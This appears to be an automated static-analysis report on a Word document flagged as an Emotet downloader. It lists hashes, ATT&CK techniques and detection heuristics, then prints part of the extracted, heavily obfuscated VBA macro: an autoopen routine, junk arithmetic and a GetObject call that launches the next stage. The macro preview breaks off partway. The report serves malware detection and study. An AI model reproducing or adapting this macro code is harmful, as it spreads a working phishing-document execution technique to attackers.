Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 d66a73e7d803173b…

MALICIOUS

Office (OLE)

Size: 220.8 KB · Created: 2019-04-01 18:25:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-31
MD5: bab6d7394ad7810f5880d9ec18997a07
SHA-1: d5cad39eba8ba031ee0707e279b7647222e352c6
SHA-256: d66a73e7d803173bde8d7093e162b4a4479be814ef3011b6fae57b4a4c20fc7f
Risk score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6921756-0, strongly indicating the Emotet family. High-severity heuristics confirm the presence of VBA macros, specifically an AutoOpen macro that uses GetObject, a common technique for executing malicious code without calling Shell directly. The VBA script is heavily obfuscated (junk arithmetic and randomly named identifiers around a single GetObject call), and its structure indicates that it downloads and executes a second-stage payload, consistent with Emotet's downloader functionality.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6921756-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6921756-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 23884 bytes
SHA-256: 87798c8d8db9f69a528dd96d7ff6dca4390b0ba97a3a46353be10b1eb3d0ec73
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "UxUAAAQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "QxGAUQDC"
Attribute VB_Base = "0{57629663-E036-4A6F-98F0-EFF1E6C31B65}{06A2F77C-5374-400D-AD23-F82BA0AC5778}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "NDXkAAA"
Attribute VB_Base = "0{5967D98C-5D6F-4A78-A6F7-9CA8D94BFEF5}{74302BEE-3749-4E9E-81A6-489870EAD665}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wwBAAA1x"
Function OAA_GwCA()
   YACAGQx _
= CStr(mXkDBXQ + 698450640 + 350634897 _
* CDate(GD4AAQDZ * ChrW(883638388 / CDate(TA4AAAZC)))) _
+ Rnd(jAZCDC + (124688293 + 150388653) * _
CDate(vAAUDX * CVar(317727142 / CDate(jZADCA))))
   bAU4AkA _
= CStr(iQDZCGB + 377517511 + 90003137 _
* CDate(PXAAwAD * ChrW(387573194 / CDate(jAwBoAA)))) _
+ Rnd(BQU_xDZw + (213450782 + 104039902) * _
CDate(VAo1AcAD * CVar(592200374 / CDate(GAcDBGDA))))
End Function
Function fAAU1B()
   TAkAcAw _
= CStr(AGAAoCD + 871673702 + 247233444 _
* CDate(OC1AAABG * ChrW(601838641 / CDate(FoAAAA)))) _
+ Rnd(cAQoQB + (252395938 + 975920353) * _
CDate(kDA4AUA * CVar(969792812 / CDate(d_QBAUBD))))
   WBUD4x _
= CStr(qxoBAAU + 187523751 + 43528182 _
* CDate(YxAAUZ4A * ChrW(587407696 / CDate(HZAoAAQD)))) _
+ Rnd(vxxCwUc + (220246866 + 650023877) * _
CDate(vDAxAB * CVar(305836183 / CDate(PBAooD4A))))
End Function
Sub autoopen()
YBkBADQA
End Sub
Function YBkBADQA()
On Error Resume Next
   ZAAU1GA1 _
= CStr(icoXoADA + 28051417 + 804982137 _
* CDate(RAAA_c * ChrW(789459752 / CDate(ZQQABoD)))) _
+ Rnd(Q__ZAG + (333692387 + 467096383) * _
CDate(U4BGXAkA * CVar(274311250 / CDate(EZGwDw))))
   zoAo1c _
= CStr(sQG1A_ + 879776174 + 997078623 _
* CDate(mAwAkABB * ChrW(744036726 / CDate(aCADCBZ)))) _
+ Rnd(sAACAQw + (215786790 + 23107145) * _
CDate(aA4UXAAA * CVar(586315993 / CDate(MoUA4oC))))
Set kGwCcA = GetObject(QxGAUQDC.iQAAXD.Text + NDXkAAA.sUA4DAA + QxGAUQDC.iQAAXD.Text)
   j1AABAD _
= CStr(qUcQAcB + 843784000 + 580643588 _
* CDate(jQxDoU * ChrW(464691084 / CDate(zA1X_AA)))) _
+ Rnd(jxGkAAAX + (483773686 + 458340497) * _
CDate(jAUXQBA * CVar(693308014 / CDate(ixAQXD))))
   O_kxxc _
= CStr(EXXokAB + 196257180 + 14056298 _
* CDate(UxwA_4_ * ChrW(316560217 / CDate(YAAcQ41)))) _
+ Rnd(bAXko_ + (31434075 + 563092247) * _
CDate(j4QUQwxA * CVar(708958964 / CDate(bAAx4BA))))
   mAkxQw _
= CStr(jBDBAB + 806235266 + 799568753 _
* CDate(nABAoA1Q * ChrW(932596828 / CDate(TDQAoAB)))) _
+ Rnd(qQ14AUA + (131962361 + 742008906) * _
CDate(F1DDcD * CVar(585522769 / CDate(mx1AQ1_A))))
If 981942 = 981942 Then
   F1Q1kkU _
= CStr(woADZwx + 484678435 + 56112644 _
* CDate(TAwxAQB * ChrW(93766251 / CDate(GAQ4AAUD)))) _
+ Rnd(wGGUDQ + (955100207 + 903254977) * _
CDate(wUQA1DD * CVar(751842407 / CDate(N1wGAUC))))
   WwAQA1A _
= CStr(VwBAQAw + 192267095 + 442301121 _
* CDate(bABxCAXc * ChrW(190418476 / CDate(KGkAwcB)))) _
+ Rnd(BAAXACUD + (907030320 + 355235254) * _
CDate(UXcAAABG * CVar(133907537 / CDate(wAxoQ_))))
   nDADc4 _
= CStr(nDZBcA_c + 187277649 + 736415139 _
* CDate(hw_AADoX * ChrW(853578821 / CDate(FQZGDUXw)))) _
+ Rnd(iAAZAD + (340148745 + 831142149) * _
CDate(z4CZQA * CVar(844793074 / CDate(kXAUAUA))))
kGwCcA. _
ShOwWiNdOw = QxGAUQDC.NCZ1XCC4 + QxGAUQDC.NCZ1XCC4 + QxGAUQDC.NCZ1XCC4
   ZAQBQBQ _
= CStr(nxcQwBAA + 720530856 + 587226502 _
* CDate(rAZkZU * ChrW(919297338 / CDate(YCAoBQ4)))) _
+ Rnd(fAZAcoAG + (212741025 + 170423378) * _
CDate(DAAAAcAU * CVar(25855566 / CDate(DD1DXoGx))))
   oAA4AC _
= CStr(MQUDAk + 164459281 + 98728
... (truncated)